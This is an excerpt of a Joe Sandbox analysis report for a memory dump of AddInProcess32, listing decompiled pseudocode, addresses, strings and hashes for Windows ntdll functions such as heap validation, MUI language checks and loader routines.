						L018777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
					}
					_v8 = _t280;
					goto L16;
				}
			}

0x01863d3c
0x01863d42
0x01863d44
0x01863d46
0x01863d49
0x01863d4c
0x01863d4f
0x01863d52
0x01863d55
0x01863d58
0x01863d5b
0x01863d5f
0x01863d61
0x01863d66
0x018b8213
0x018b8218
0x01864085
0x01864088
0x0186408e
0x01864094
0x0186409a
0x018640a0
0x018640a6
0x018640a9
0x018640af
0x018640b6
0x018640bd
0x018640bd
0x01863d83
0x018b821f
0x018b8229
0x018b8238
0x018b8238
0x018b823d
0x018b823d
0x01863da0
0x01863daf
0x01863db5
0x01863dba
0x01863dba
0x01863dd4
0x01863e94
0x01863eab
0x01863f6d
0x01863f84
0x0186406b
0x0186406b
0x0186406e
0x0186406e
0x01864070
0x01864074
0x018b8351
0x018b8351
0x0186407a
0x0186407f
0x018b835d
0x018b8370
0x018b8377
0x018b8379
0x018b837c
0x018b837c
0x018b835d
0x00000000
0x0186407f
0x01863f8a
0x01863f8d
0x01863f90
0x01863f95
0x018b830d
0x018b830f
0x01863f9b
0x01863fac
0x01863fae
0x01863fb1
0x01863fb1
0x01863fb6
0x018b8317
0x018b831a
0x00000000
0x01863fbc
0x01863fc1
0x01863fc9
0x01863fd7
0x01863fda
0x01863fdd
0x01864021
0x01864021
0x01864029
0x01864030
0x01864044
0x01864046
0x01864046
0x01864044
0x01864049
0x018b8327
0x018b8334
0x018b8339
0x018b833c
0x0186404f
0x0186404f
0x0186404f
0x01864051
0x01864056
0x01864063
0x01864063
0x01864068
0x00000000
0x01864068
0x01863fdf
0x01863fe2
0x01863fe4
0x01863fe7
0x01863fef
0x01864003
0x01864005
0x01864005
0x0186400c
0x01864013
0x01864016
0x01864017
0x0186401b
0x0186401e
0x00000000
0x0186401e
0x01863fb6
0x01863eb1
0x01863eb4
0x01863eb7
0x01863ebc
0x018b82a9
0x018b82ab
0x01863ec2
0x01863ed3
0x01863ed5
0x01863ed8
0x01863ed8
0x01863edd
0x018b82b3
0x018b82b6
0x00000000
0x01863ee3
0x01863ee8
0x01863eed
0x01863ef0
0x01863ef3
0x01863f02
0x01863f05
0x01863f08
0x018b82c0
0x018b82c3
0x018b82c5
0x018b82c8
0x018b82d0
0x018b82e4
0x018b82e6
0x018b82e6
0x018b82ed
0x018b82f4
0x018b82f7
0x018b82f8
0x018b82fc
0x018b82ff
0x018b82ff
0x01863f0e
0x01863f11
0x01863f16
0x01863f1d
0x01863f31
0x018b8307
0x018b8307
0x01863f31
0x01863f39
0x01863f48
0x01863f4d
0x01863f50
0x01863f50
0x01863f53
0x01863f58
0x01863f65
0x01863f65
0x01863f6a
0x00000000
0x01863f6a
0x01863edd
0x01863dda
0x01863ddd
0x01863de0
0x01863de5
0x018b8245
0x01863deb
0x01863df7
0x01863dfc
0x01863dfe
0x01863e01
0x01863e01
0x01863e06
0x018b824d
0x018b824f
0x018b8254
0x00000000
0x01863e0c
0x01863e11
0x01863e16
0x01863e19
0x01863e29
0x01863e2c
0x01863e2f
0x018b825c
0x018b825f
0x018b8261
0x018b8264
0x018b826c
0x018b8280
0x018b8282
0x018b8282
0x018b8289
0x018b8290
0x018b8293
0x018b8294
0x018b8298
0x018b829b
0x018b829b
0x01863e35
0x01863e38
0x01863e3d
0x01863e44
0x01863e58
0x018b82a3
0x018b82a3
0x01863e58
0x01863e60
0x01863e6f
0x01863e74
0x01863e77
0x01863e77
0x01863e7a
0x01863e7f
0x01863e8c
0x01863e8c
0x01863e91
0x00000000
0x01863e91

Strings

Kernel-MUI-Language-Allowed, xrefs: 01863DC0
Kernel-MUI-Language-Disallowed, xrefs: 01863E97
Kernel-MUI-Number-Allowed, xrefs: 01863D8C
WindowsExcludedProcs, xrefs: 01863D6F
Kernel-MUI-Language-SKU, xrefs: 01863F70

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 7d83e22b37c305bb196b190335696969ef3fb26b25ba615e0877e4f31802f3e0
Instruction ID: 8ea8e64c5b6034e0f761ddf6a6b3c819bbbcd2fc5a73f40d2bbf07d61352ac3e
Opcode Fuzzy Hash: 7d83e22b37c305bb196b190335696969ef3fb26b25ba615e0877e4f31802f3e0
Instruction Fuzzy Hash: 0CF11572D00619EBDB12DF98C980AEEBBBDFF59750F14006AE905E7251E7349B01CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0192E824 Relevance: 6.5, APIs: 4, Instructions: 493
timeCOMMONCrypto

Download Yara Rule

C-Code - Quality: 50%

			E0192E824(signed int __ecx, signed int* __edx) {
				signed int _v8;
				signed char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				unsigned int _v44;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t177;
				signed int _t179;
				unsigned int _t202;
				signed char _t207;
				signed char _t210;
				signed int _t230;
				void* _t244;
				unsigned int _t247;
				signed int _t288;
				signed int _t289;
				signed int _t291;
				signed char _t293;
				signed char _t295;
				signed char _t298;
				intOrPtr* _t303;
				signed int _t310;
				signed char _t316;
				signed int _t319;
				signed char _t323;
				signed char _t330;
				signed int _t334;
				signed int _t337;
				signed int _t341;
				signed char _t345;
				signed char _t347;
				signed int _t353;
				signed char _t354;
				void* _t383;
				signed char _t385;
				signed char _t386;
				unsigned int _t392;
				signed int _t393;
				signed int _t395;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				unsigned int _t403;
				void* _t404;
				unsigned int _t405;
				signed int _t406;
				signed char _t412;
				unsigned int _t413;
				unsigned int _t418;
				void* _t419;
				void* _t420;
				void* _t421;
				void* _t422;
				void* _t423;
				signed char* _t425;
				signed int _t426;
				signed int _t428;
				unsigned int _t430;
				signed int _t431;
				signed int _t433;

				_v8 =  *0x194d360 ^ _t433;
				_v40 = __ecx;
				_v16 = __edx;
				_t289 = 0x4cb2f;
				_t425 = __edx[1];
				_t403 =  *__edx << 2;
				if(_t403 < 8) {
					L3:
					_t404 = _t403 - 1;
					if(_t404 == 0) {
						L16:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						L17:
						_t426 = _v40;
						_v20 = _t426 + 0x1c;
						_t177 = L0187FAD0(_t426 + 0x1c);
						_t385 = 0;
						while(1) {
							L18:
							_t405 =  *(_t426 + 4);
							_t179 = (_t177 | 0xffffffff) << (_t405 & 0x0000001f);
							_t316 = _t289 & _t179;
							_v24 = _t179;
							_v32 = _t316;
							_v12 = _t316 >> 0x18;
							_v36 = _t316 >> 0x10;
							_v28 = _t316 >> 8;
							if(_t385 != 0) {
								goto L21;
							}
							_t418 = _t405 >> 5;
							if(_t418 == 0) {
								_t406 = 0;
								L31:
								if(_t406 == 0) {
									L35:
									E0187FA00(_t289, _t316, _t406, _t426 + 0x1c);
									 *0x194b1e0(0xc +  *_v16 * 4,  *((intOrPtr*)(_t426 + 0x28)));
									_t319 =  *((intOrPtr*)( *((intOrPtr*)(_t426 + 0x20))))();
									_v36 = _t319;
									if(_t319 != 0) {
										asm("stosd");
										asm("stosd");
										asm("stosd");
										_t408 = _v16;
										 *(_t319 + 8) =  *(_t319 + 8) & 0xff000001 | 0x00000001;
										 *((char*)(_t319 + 0xb)) =  *_v16;
										 *(_t319 + 4) = _t289;
										_t53 = _t319 + 0xc; // 0xc
										E01872280(E0189F3E0(_t53,  *((intOrPtr*)(_v16 + 4)),  *_v16 << 2), _v20);
										_t428 = _v40;
										_t386 = 0;
										while(1) {
											L38:
											_t202 =  *(_t428 + 4);
											_v16 = _v16 | 0xffffffff;
											_v16 = _v16 << (_t202 & 0x0000001f);
											_t323 = _v16 & _t289;
											_v20 = _t323;
											_v20 = _v20 >> 0x18;
											_v28 = _t323;
											_v28 = _v28 >> 0x10;
											_v12 = _t323;
											_v12 = _v12 >> 8;
											_v32 = _t323;
											if(_t386 != 0) {
												goto L41;
											}
											_t247 = _t202 >> 5;
											_v24 = _t247;
											if(_t247 == 0) {
												_t412 = 0;
												L50:
												if(_t412 == 0) {
													L53:
													_t291 =  *(_t428 + 4);
													_v28 =  *((intOrPtr*)(_t428 + 0x28));
													_v44 =  *(_t428 + 0x24);
													_v32 =  *((intOrPtr*)(_t428 + 0x20));
													_t207 = _t291 >> 5;
													if( *_t428 < _t207 + _t207) {
														L74:
														_t430 = _t291 >> 5;
														_t293 = _v36;
														_t210 = (_t207 | 0xffffffff) << (_t291 & 0x0000001f) &  *(_t293 + 4);
														_v44 = _t210;
														_t159 = _t430 - 1; // 0xffffffdf
														_t428 = _v40;
														_t330 =  *(_t428 + 8);
														_t386 = _t159 & (_v44 >> 0x00000018) + ((_v44 >> 0x00000010 & 0x000000ff) + ((_t210 >> 0x00000008 & 0x000000ff) + ((_t210 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
														_t412 = _t293;
														 *_t293 =  *(_t330 + _t386 * 4);
														 *(_t330 + _t386 * 4) = _t293;
														 *_t428 =  *_t428 + 1;
														_t289 = 0;
														L75:
														E0186FFB0(_t289, _t412, _t428 + 0x1c);
														if(_t289 != 0) {
															_t428 =  *(_t428 + 0x24);
															 *0x194b1e0(_t289,  *((intOrPtr*)(_t428 + 0x28)));
															 *_t428();
														}
														L77:
														return E0189B640(_t412, _t289, _v8 ^ _t433, _t386, _t412, _t428);
													}
													_t334 = 2;
													_t207 = E0188F3D5( &_v24, _t207 * _t334, _t207 * _t334 >> 0x20);
													if(_t207 < 0) {
														goto L74;
													}
													_t413 = _v24;
													if(_t413 < 4) {
														_t413 = 4;
													}
													 *0x194b1e0(_t413 << 2, _v28);
													_t207 =  *_v32();
													_t386 = _t207;
													_v16 = _t386;
													if(_t386 == 0) {
														_t291 =  *(_t428 + 4);
														if(_t291 >= 0x20) {
															goto L74;
														}
														_t289 = _v36;
														_t412 = 0;
														goto L75;
													} else {
														_t108 = _t413 - 1; // 0x3
														_t337 = _t108;
														if((_t413 & _t337) == 0) {
															L62:
															if(_t413 > 0x4000000) {
																_t413 = 0x4000000;
															}
															_t295 = _t386;
															_v24 = _v24 & 0x00000000;
															_t392 = _t413 << 2;
															_t230 = _t428 | 0x00000001;
															_t393 = _t392 >> 2;
															asm("sbb ecx, ecx");
															_t341 =  !(_v16 + _t392) & _t393;
															if(_t341 <= 0) {
																L67:
																_t395 = (_t393 | 0xffffffff) << ( *(_t428 + 4) & 0x0000001f);
																_v32 = _t395;
																_v20 = 0;
																if(( *(_t428 + 4) & 0xffffffe0) <= 0) {
																	L72:
																	_t345 =  *(_t428 + 8);
																	_t207 = _v16;
																	_t291 =  *(_t428 + 4) & 0x0000001f | _t413 << 0x00000005;
																	 *(_t428 + 8) = _t207;
																	 *(_t428 + 4) = _t291;
																	if(_t345 != 0) {
																		 *0x194b1e0(_t345, _v28);
																		_t207 =  *_v44();
																		_t291 =  *(_t428 + 4);
																	}
																	goto L74;
																} else {
																	goto L68;
																}
																do {
																	L68:
																	_t298 =  *(_t428 + 8);
																	_t431 = _v20;
																	_v12 = _t298;
																	while(1) {
																		_t347 =  *(_t298 + _t431 * 4);
																		_v24 = _t347;
																		if((_t347 & 0x00000001) != 0) {
																			goto L71;
																		}
																		 *(_t298 + _t431 * 4) =  *_t347;
																		_t300 =  *(_t347 + 4) & _t395;
																		_t398 = _v16;
																		_t353 = _t413 - 0x00000001 & (( *(_t347 + 4) & _t395) >> 0x00000018) + ((( *(_t347 + 4) & _t395) >> 0x00000010 & 0x000000ff) + ((( *(_t347 + 4) & _t395) >> 0x00000008 & 0x000000ff) + ((_t300 & 0x000000ff) + 0x00b15dcb) * 0x00000025) * 0x00000025) * 0x00000025;
																		_t303 = _v24;
																		 *_t303 =  *((intOrPtr*)(_t398 + _t353 * 4));
																		 *((intOrPtr*)(_t398 + _t353 * 4)) = _t303;
																		_t395 = _v32;
																		_t298 = _v12;
																	}
																	L71:
																	_v20 = _t431 + 1;
																	_t428 = _v40;
																} while (_v20 <  *(_t428 + 4) >> 5);
																goto L72;
															} else {
																_t399 = _v24;
																do {
																	_t399 = _t399 + 1;
																	 *_t295 = _t230;
																	_t295 = _t295 + 4;
																} while (_t399 < _t341);
																goto L67;
															}
														}
														_t354 = _t337 | 0xffffffff;
														if(_t413 == 0) {
															L61:
															_t413 = 1 << _t354;
															goto L62;
														} else {
															goto L60;
														}
														do {
															L60:
															_t354 = _t354 + 1;
															_t413 = _t413 >> 1;
														} while (_t413 != 0);
														goto L61;
													}
												}
												_t89 = _t412 + 8; // 0x8
												_t244 = E0192E7A8(_t89);
												_t289 = _v36;
												if(_t244 == 0) {
													_t412 = 0;
												}
												goto L75;
											}
											_t386 =  *(_t428 + 8) + (_v24 - 0x00000001 & (_v20 & 0x000000ff) + 0x164b2f3f + (((_t323 & 0x000000ff) * 0x00000025 + (_v12 & 0x000000ff)) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025) * 4;
											_t323 = _v32;
											while(1) {
												L41:
												_t386 =  *_t386;
												_v12 = _t386;
												if((_t386 & 0x00000001) != 0) {
													break;
												}
												if(_t323 == ( *(_t386 + 4) & _v16)) {
													L45:
													if(_t386 == 0) {
														goto L53;
													}
													if(E0192E7EB(_t386, _t408) != 0) {
														_t412 = _v12;
														goto L50;
													}
													_t386 = _v12;
													goto L38;
												}
											}
											_t386 = 0;
											_v12 = 0;
											goto L45;
										}
									}
									_t412 = 0;
									goto L77;
								}
								_t38 = _t406 + 8; // 0x8
								_t364 = _t38;
								if(E0192E7A8(_t38) == 0) {
									_t406 = 0;
								}
								E0187FA00(_t289, _t364, _t406, _v20);
								goto L77;
							}
							_t24 = _t418 - 1; // -1
							_t385 =  *((intOrPtr*)(_t426 + 8)) + (_t24 & (_v12 & 0x000000ff) + 0x164b2f3f + (((_t316 & 0x000000ff) * 0x00000025 + (_v28 & 0x000000ff)) * 0x00000025 + (_v36 & 0x000000ff)) * 0x00000025) * 4;
							_t316 = _v32;
							L21:
							_t406 = _v24;
							while(1) {
								_t385 =  *_t385;
								_v12 = _t385;
								if((_t385 & 0x00000001) != 0) {
									break;
								}
								if(_t316 == ( *(_t385 + 4) & _t406)) {
									L26:
									if(_t385 == 0) {
										goto L35;
									}
									_t177 = E0192E7EB(_t385, _v16);
									if(_t177 != 0) {
										_t406 = _v12;
										goto L31;
									}
									_t385 = _v12;
									goto L18;
								}
							}
							_t385 = 0;
							_v12 = 0;
							goto L26;
						}
					}
					_t419 = _t404 - 1;
					if(_t419 == 0) {
						L15:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L16;
					}
					_t420 = _t419 - 1;
					if(_t420 == 0) {
						L14:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L15;
					}
					_t421 = _t420 - 1;
					if(_t421 == 0) {
						L13:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L14;
					}
					_t422 = _t421 - 1;
					if(_t422 == 0) {
						L12:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L13;
					}
					_t423 = _t422 - 1;
					if(_t423 == 0) {
						L11:
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L12;
					}
					if(_t423 != 1) {
						goto L17;
					} else {
						_t289 = _t289 * 0x25 + ( *_t425 & 0x000000ff);
						_t425 =  &(_t425[1]);
						goto L11;
					}
				} else {
					_t401 = _t403 >> 3;
					_t403 = _t403 + _t401 * 0xfffffff8;
					do {
						_t383 = ((((((_t425[1] & 0x000000ff) * 0x25 + (_t425[2] & 0x000000ff)) * 0x25 + (_t425[3] & 0x000000ff)) * 0x25 + (_t425[4] & 0x000000ff)) * 0x25 + (_t425[5] & 0x000000ff)) * 0x25 + (_t425[6] & 0x000000ff)) * 0x25 - _t289 * 0x2fe8ed1f;
						_t310 = ( *_t425 & 0x000000ff) * 0x1a617d0d;
						_t288 = _t425[7] & 0x000000ff;
						_t425 =  &(_t425[8]);
						_t289 = _t310 + _t383 + _t288;
						_t401 = _t401 - 1;
					} while (_t401 != 0);
					goto L3;
				}
			}

0x0192e833
0x0192e839
0x0192e83e
0x0192e841
0x0192e848
0x0192e84b
0x0192e851
0x0192e8b2
0x0192e8b2
0x0192e8b5
0x0192e90b
0x0192e911
0x0192e913
0x0192e913
0x0192e91a
0x0192e91d
0x0192e922
0x0192e924
0x0192e924
0x0192e924
0x0192e92f
0x0192e933
0x0192e935
0x0192e93a
0x0192e940
0x0192e948
0x0192e950
0x0192e955
0x00000000
0x00000000
0x0192e957
0x0192e95c
0x0192e9cb
0x0192e9d2
0x0192e9d4
0x0192e9f2
0x0192e9f6
0x0192ea10
0x0192ea18
0x0192ea1a
0x0192ea1f
0x0192ea2c
0x0192ea2d
0x0192ea2e
0x0192ea32
0x0192ea3d
0x0192ea42
0x0192ea45
0x0192ea51
0x0192ea60
0x0192ea65
0x0192ea68
0x0192ea6a
0x0192ea6a
0x0192ea6a
0x0192ea6f
0x0192ea76
0x0192ea7c
0x0192ea7e
0x0192ea81
0x0192ea85
0x0192ea88
0x0192ea8c
0x0192ea8f
0x0192ea93
0x0192ea98
0x00000000
0x00000000
0x0192ea9a
0x0192ea9d
0x0192eaa2
0x0192eb0e
0x0192eb15
0x0192eb17
0x0192eb33
0x0192eb36
0x0192eb39
0x0192eb3f
0x0192eb45
0x0192eb4a
0x0192eb52
0x0192ecb1
0x0192ecb9
0x0192ecbe
0x0192ecc3
0x0192ecc6
0x0192eceb
0x0192ecee
0x0192ecf9
0x0192ecfe
0x0192ed00
0x0192ed05
0x0192ed07
0x0192ed0a
0x0192ed0c
0x0192ed0e
0x0192ed12
0x0192ed19
0x0192ed1e
0x0192ed24
0x0192ed2a
0x0192ed2a
0x0192ed2c
0x0192ed3e
0x0192ed3e
0x0192eb5a
0x0192eb62
0x0192eb69
0x00000000
0x00000000
0x0192eb6f
0x0192eb75
0x0192eb79
0x0192eb79
0x0192eb88
0x0192eb8e
0x0192eb90
0x0192eb92
0x0192eb97
0x0192ed3f
0x0192ed45
0x00000000
0x00000000
0x0192ed4b
0x0192ed4e
0x00000000
0x0192eb9d
0x0192eb9d
0x0192eb9d
0x0192eba2
0x0192ebb5
0x0192ebbc
0x0192ebbe
0x0192ebbe
0x0192ebc3
0x0192ebc5
0x0192ebcb
0x0192ebd2
0x0192ebd5
0x0192ebdb
0x0192ebdf
0x0192ebe1
0x0192ebf0
0x0192ebf9
0x0192ec04
0x0192ec07
0x0192ec0a
0x0192ec82
0x0192ec85
0x0192ec8b
0x0192ec91
0x0192ec93
0x0192ec96
0x0192ec9b
0x0192eca6
0x0192ecac
0x0192ecae
0x0192ecae
0x00000000
0x00000000
0x00000000
0x00000000
0x0192ec0c
0x0192ec0c
0x0192ec0c
0x0192ec0f
0x0192ec12
0x0192ec15
0x0192ec15
0x0192ec18
0x0192ec1e
0x00000000
0x00000000
0x0192ec22
0x0192ec28
0x0192ec4b
0x0192ec5b
0x0192ec5d
0x0192ec63
0x0192ec65
0x0192ec68
0x0192ec6b
0x0192ec6b
0x0192ec70
0x0192ec71
0x0192ec74
0x0192ec7d
0x00000000
0x0192ebe3
0x0192ebe3
0x0192ebe6
0x0192ebe6
0x0192ebe7
0x0192ebe9
0x0192ebec
0x00000000
0x0192ebe6
0x0192ebe1
0x0192eba4
0x0192eba9
0x0192ebb0
0x0192ebb3
0x00000000
0x00000000
0x00000000
0x00000000
0x0192ebab
0x0192ebab
0x0192ebab
0x0192ebac
0x0192ebac
0x00000000
0x0192ebab
0x0192eb97
0x0192eb19
0x0192eb1c
0x0192eb21
0x0192eb26
0x0192eb2c
0x0192eb2c
0x00000000
0x0192eb26
0x0192ead6
0x0192ead9
0x0192eadc
0x0192eadc
0x0192eadc
0x0192eade
0x0192eae4
0x00000000
0x00000000
0x0192eaee
0x0192eaf7
0x0192eaf9
0x00000000
0x00000000
0x0192eb04
0x0192eb12
0x00000000
0x0192eb12
0x0192eb06
0x00000000
0x0192eb06
0x0192eaf0
0x0192eaf2
0x0192eaf4
0x00000000
0x0192eaf4
0x0192ea6a
0x0192ea21
0x00000000
0x0192ea21
0x0192e9d6
0x0192e9d6
0x0192e9e0
0x0192e9e2
0x0192e9e2
0x0192e9e8
0x00000000
0x0192e9e8
0x0192e987
0x0192e98f
0x0192e992
0x0192e995
0x0192e995
0x0192e998
0x0192e998
0x0192e99a
0x0192e9a0
0x00000000
0x00000000
0x0192e9a9
0x0192e9b2
0x0192e9b4
0x00000000
0x00000000
0x0192e9ba
0x0192e9c1
0x0192e9cf
0x00000000
0x0192e9cf
0x0192e9c3
0x00000000
0x0192e9c3
0x0192e9ab
0x0192e9ad
0x0192e9af
0x00000000
0x0192e9af
0x0192e924
0x0192e8b7
0x0192e8ba
0x0192e902
0x0192e908
0x0192e90a
0x00000000
0x0192e90a
0x0192e8bc
0x0192e8bf
0x0192e8f9
0x0192e8ff
0x0192e901
0x00000000
0x0192e901
0x0192e8c1
0x0192e8c4
0x0192e8f0
0x0192e8f6
0x0192e8f8
0x00000000
0x0192e8f8
0x0192e8c6
0x0192e8c9
0x0192e8e7
0x0192e8ed
0x0192e8ef
0x00000000
0x0192e8ef
0x0192e8cb
0x0192e8ce
0x0192e8de
0x0192e8e4
0x0192e8e6
0x00000000
0x0192e8e6
0x0192e8d3
0x00000000
0x0192e8d5
0x0192e8db
0x0192e8dd
0x00000000
0x0192e8dd
0x0192e853
0x0192e855
0x0192e85b
0x0192e85d
0x0192e897
0x0192e89c
0x0192e8a2
0x0192e8a6
0x0192e8ab
0x0192e8ad
0x0192e8ad
0x00000000
0x0192e85d

APIs

RtlDebugPrintTimes.NTDLL ref: 0192EA10
RtlDebugPrintTimes.NTDLL ref: 0192ED24

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: c3e059ec2202891d7b4ac61a58a814e12e469cba1d4f428aecc895fef02feca1
Instruction ID: c28866c78c3b14411098287e95e7b300a6994a5020281484f62dc4a3996a43ef
Opcode Fuzzy Hash: c3e059ec2202891d7b4ac61a58a814e12e469cba1d4f428aecc895fef02feca1
Instruction Fuzzy Hash: 5702B272F006268BCB18CFADC8D167EFBF6AF88201B19856DD45ADB385D634E901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 018540E1 Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E018540E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E0185B150();
					} else {
						E0185B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0185B150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E0185B150(", passed to %s", _t29);
					}
					_push("\n");
					E0185B150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x1946378 = 1;
						asm("int3");
						 *0x1946378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x018540e6
0x018540e8
0x018540f1
0x018b042d
0x018b044c
0x018b0451
0x018b042f
0x018b0444
0x018b0449
0x018b045d
0x018b0466
0x018b046e
0x018b0474
0x018b0475
0x018b047a
0x018b048a
0x018b048c
0x018b0493
0x018b0494
0x018b0494
0x00000000
0x018b049b
0x00000000

Strings

, passed to %s, xrefs: 018B0469
HEAP: , xrefs: 018B044C
RtlAllocateHeap, xrefs: 018B0468
HEAP[%wZ]: , xrefs: 018B043F
Invalid heap signature for heap at %p, xrefs: 018B0458

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 07557af578fb1d11dbdd9e418a66f9e8c1989050a2aed20e23c10de806973b5e
Instruction ID: 1fdc5106d42faf1f92a7add07fd925072c5baedac27b460f9b0eb2c3adb8eb69
Opcode Fuzzy Hash: 07557af578fb1d11dbdd9e418a66f9e8c1989050a2aed20e23c10de806973b5e
Instruction Fuzzy Hash: 68014932144581AFD369576D94CDF9277B4DB51B35F288029F404CB7819AAC5740C961

Uniqueness

Uniqueness Score: -1.00%

Function 019149A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 01914A4A, 01914A5D, 01914A5F, 01914AC4
Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 01914A61
HEAP[%wZ]: , xrefs: 01914A3D, 01914AB7
This is located in the %s field of the heap header., xrefs: 01914AD6

Memory Dump Source

Source File: 00000011.00000002.429111171.0000000001830000.00000040.00000800.00020000.00000000.sdmp, Offset: 01830000, based on PE: true

Associated: 00000011.00000002.430801201.000000000194B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.430831946.000000000194F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_1830000_AddInProcess32.jbxd

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: eb5683a4401aa8a3c32ae5a2d3339f133f2db35b0a6d7e4646abe32f1eb7ebdc
Instruction ID: 4be1f4056d6b74d78962e7e0eee5afe9a5f75d712fd162616d4068aa789a24da
Opcode Fuzzy Hash: eb5683a4401aa8a3c32ae5a2d3339f133f2db35b0a6d7e4646abe32f1eb7ebdc
Instruction Fuzzy Hash: 89314A32200509EFD751DB9DC888F6777E9EF08B21F194469F509DB284E770EA80CB55

Uniqueness

Uniqueness Score: -1.00%

Function 01868794 Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E01868794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E0186934A() != 0) {
								_t159 = E018DA9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x1945780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E018D5510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x1945780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E0186849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
